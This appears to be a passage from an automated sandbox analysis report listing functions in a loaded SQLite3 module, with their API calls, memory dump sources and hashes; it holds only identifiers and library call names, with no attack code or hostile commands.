                                                                                                    • Opcode Fuzzy Hash: 2f95c15b2eb9a432fbd4b942522ba2c7ad5a893a8466aa354c5720371369b2d6
                                                                                                    • Instruction Fuzzy Hash: 0F81BC74A05A118FDB40EFA8C980649BBF2FBC5754F29C869E84CCB344D731E942CB52
                                                                                                    Function 61E88DD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109filememoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                    • String ID: @
                                                                                                    • API String ID: 1503958624-2766056989
                                                                                                    • Opcode ID: 60aee9ea40aab68af79e6df5610f4eecb8e258f19af9048b8a1c840d984bb8c9
                                                                                                    • Instruction ID: f82871060a407b91e66b33a648292cfa058b874e1f09ce83e9b304626e84e32f
                                                                                                    • Opcode Fuzzy Hash: 60aee9ea40aab68af79e6df5610f4eecb8e258f19af9048b8a1c840d984bb8c9
                                                                                                    • Instruction Fuzzy Hash: 5D4145B5915B029FDB40EF68C584A0AFBE1FB85358F64C91DE89D97380E334E884CB52
                                                                                                    Function 61E23B0D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E23B2F
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E23B3D
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E23B4A
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E23B78
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E23BA2
                                                                                                    • sqlite3_result_int.SQLITE3 ref: 61E23BE2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                    • String ID: 5a
                                                                                                    • API String ID: 4226599549-1978421491
                                                                                                    • Opcode ID: 2cc03a882cae7cefcfb45b62e5108ef0c8bde66bdbfa043cfffab11f62d7e246
                                                                                                    • Instruction ID: 2b7521870fce3e4e94fcf0f4702942077138794d6a1db02f6f244af4459149bf
                                                                                                    • Opcode Fuzzy Hash: 2cc03a882cae7cefcfb45b62e5108ef0c8bde66bdbfa043cfffab11f62d7e246
                                                                                                    • Instruction Fuzzy Hash: C22114709087459BCB00DFA9C595A99FBF1BF88328F20C52EE8AA9B390D731D841CF51
                                                                                                    Function 61E531F1 Relevance: 12.0, APIs: 8, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_finalize$sqlite3_log
                                                                                                    • String ID:
                                                                                                    • API String ID: 83268734-0
                                                                                                    • Opcode ID: 000f108c336fb9a3ed0139af9226091063ebc9212437db9f46c606c7d2eefbf6
                                                                                                    • Instruction ID: 5ef85ac33cb3beb89fff54747c93703cf5945466df08773495135d114bf54870
                                                                                                    • Opcode Fuzzy Hash: 000f108c336fb9a3ed0139af9226091063ebc9212437db9f46c606c7d2eefbf6
                                                                                                    • Instruction Fuzzy Hash: 7D01C5B4504A419BCB10AFB8C4C4559BBE4EF48365F528A69EC8E8B305DB74D890CF51
                                                                                                    Function 61E05256 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strnicmp
                                                                                                    • String ID: :a
                                                                                                    • API String ID: 1961171630-2899067487
                                                                                                    • Opcode ID: 72a24fe719f091fa4efcd3426caad224498c1a24f2161d72900f383498533726
                                                                                                    • Instruction ID: c15fe2bd0a4b26cb9938837279c8592802aa932a30ba2301bc44475842b1ed19
                                                                                                    • Opcode Fuzzy Hash: 72a24fe719f091fa4efcd3426caad224498c1a24f2161d72900f383498533726
                                                                                                    • Instruction Fuzzy Hash: 7D51087554D24589FB204E9888823E9BFA79F4330FF79D41AD4A587251D37EC0BB8A03
                                                                                                    Function 61E24B6A Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                    • String ID:
                                                                                                    • API String ID: 3386002893-0
                                                                                                    • Opcode ID: 0e435223d6235bd9a72acf04055ed1a5ebaabdb4ccc663752a0153102643fa42
                                                                                                    • Instruction ID: 94d21cdb1b9784f71ae68d5f63349051d909b4c1e651fe816a0688860aa94995
                                                                                                    • Opcode Fuzzy Hash: 0e435223d6235bd9a72acf04055ed1a5ebaabdb4ccc663752a0153102643fa42
                                                                                                    • Instruction Fuzzy Hash: F7619B70A042558FEB04DFACC5A069DBBF1AF8D314F25C66EE8A5AB391D730D842CB51
                                                                                                    Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep_amsg_exit
                                                                                                    • String ID:
                                                                                                    • API String ID: 1015461914-0
                                                                                                    • Opcode ID: bce5228ecbe7f0fc739df63516fc92ade41788d304e6aa52f20a3708bc7c9bf0
                                                                                                    • Instruction ID: 40adf2c5f99e95fc4ed1983a49bd695402b4968f80a683025326873170e7aa61
                                                                                                    • Opcode Fuzzy Hash: bce5228ecbe7f0fc739df63516fc92ade41788d304e6aa52f20a3708bc7c9bf0
                                                                                                    • Instruction Fuzzy Hash: BC417CB4A156518BEB01AFE8C58071A7BF2FB8635DF64C92ED4848F344D7B5C891CB82
                                                                                                    Function 61E36C7D Relevance: 10.6, APIs: 7, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E36CA5
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E36CB7
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E36CCD
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E36CDB
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E36DBD
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E36DC8
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E36DDE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 2838836587-0
                                                                                                    • Opcode ID: 249a2aee32f34b8baa99c002f29403e700cf7c8192e5ce86475ed1ac59772233
                                                                                                    • Instruction ID: ef903a0660821e4582548f20e4be7daa42110b6fdeb12b0369a795bf7dc934a7
                                                                                                    • Opcode Fuzzy Hash: 249a2aee32f34b8baa99c002f29403e700cf7c8192e5ce86475ed1ac59772233
                                                                                                    • Instruction Fuzzy Hash: D85183B49047999FCB00DFA8C48469EBBF4BF88354F11892AE898AB354E734D985CF51
                                                                                                    Function 61E249CA Relevance: 10.6, APIs: 7, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2264764126-0
                                                                                                    • Opcode ID: c904daac01daa61eb509d9b9379ca7d83bfb6be7c7e9e32c1f7686342d02d846
                                                                                                    • Instruction ID: 03277061384cf4bc7b09d9d5d34b598b395f8447fb1a5dcd03370a584af2c8b9
                                                                                                    • Opcode Fuzzy Hash: c904daac01daa61eb509d9b9379ca7d83bfb6be7c7e9e32c1f7686342d02d846
                                                                                                    • Instruction Fuzzy Hash: 3D318FB5A046568FDB04DFA9C4A06ADFBF1EF8C314F25802AD8A99B300E735D941CF95
                                                                                                    Function 61E28CF3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_log.SQLITE3 ref: 61E28D21
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E28E30), ref: 61E28D35
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28E30), ref: 61E28D5D
                                                                                                    • sqlite3_log.SQLITE3 ref: 61E28D7B
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E28E30), ref: 61E28DB1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                    • String ID: ia
                                                                                                    • API String ID: 1015584638-2003154554
                                                                                                    • Opcode ID: da09f2a95ed6ded4b63c9d88051cad9571b90e78593c8a632dcd86cb6427e51b
                                                                                                    • Instruction ID: 5ecb70d65ce8323d51f9053ebfd5a0ba8d2c080f6a380437f9c6b22e5007cb24
                                                                                                    • Opcode Fuzzy Hash: da09f2a95ed6ded4b63c9d88051cad9571b90e78593c8a632dcd86cb6427e51b
                                                                                                    • Instruction Fuzzy Hash: 2C31CE356046508FDB009F68C8A0B4677F5EFC9318F29C969E8488F32AD734D8859792
                                                                                                    Function 61E383F1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E3843B
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E3846A
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E3848F
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_mprintf.SQLITE3 ref: 61E37D14
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_result_error.SQLITE3 ref: 61E37D2A
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_free.SQLITE3 ref: 61E37D32
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                    • String ID: insert$set
                                                                                                    • API String ID: 832408550-3711289001
                                                                                                    • Opcode ID: a48f020bd02721147aca079f07da59a2e0ed00399dc12631184557adaa704568
                                                                                                    • Instruction ID: 5543241034da7eb376943ffe8e40ae73765a1ed35f27b1fa77af480c7766e75c
                                                                                                    • Opcode Fuzzy Hash: a48f020bd02721147aca079f07da59a2e0ed00399dc12631184557adaa704568
                                                                                                    • Instruction Fuzzy Hash: 80316730A082598BDB11DF68D484B9EBBF5AFC8308F24C51EE884CB751DB38E945DB41
                                                                                                    Function 61E33F37 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E33F62
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E33FC5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_error
                                                                                                    • String ID: J
                                                                                                    • API String ID: 497837271-1141589763
                                                                                                    • Opcode ID: eb668ba508c894fcc32be1e8c00a43d4a7b9989bff98ed3f8f3c176d5a1cff94
                                                                                                    • Instruction ID: 4b93f52b0d59fa72b21b1f9dad8c42799aae0485a3371d571aacd80f8ba437fc
                                                                                                    • Opcode Fuzzy Hash: eb668ba508c894fcc32be1e8c00a43d4a7b9989bff98ed3f8f3c176d5a1cff94
                                                                                                    • Instruction Fuzzy Hash: AE314174B08795DBDB10EF38C885B49BBA0AFC4314F24C52DE8998B385D739D889CB42
                                                                                                    Function 61E3388C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E338B2
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E338BC
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E338E6
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E338F1
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E33931
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                                                                    • String ID: null
                                                                                                    • API String ID: 1955785328-634125391
                                                                                                    • Opcode ID: 9a25601098fd02c1e49466cf7d47ef865d06988eb0735262c326c3a56bfc0195
                                                                                                    • Instruction ID: cf6af3531cb56ee589fac40dbeadf75e6d5bc17154ae5593e4cbba9c070d078f
                                                                                                    • Opcode Fuzzy Hash: 9a25601098fd02c1e49466cf7d47ef865d06988eb0735262c326c3a56bfc0195
                                                                                                    • Instruction Fuzzy Hash: 311108B2F486548BD704EA699491655FBE1D7C9328F24C42EE5898B384D275C886C781
                                                                                                    Function 61E34221 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E34237
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E3425C
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E34289
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E342AF
                                                                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E342BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                                                                    • String ID: J
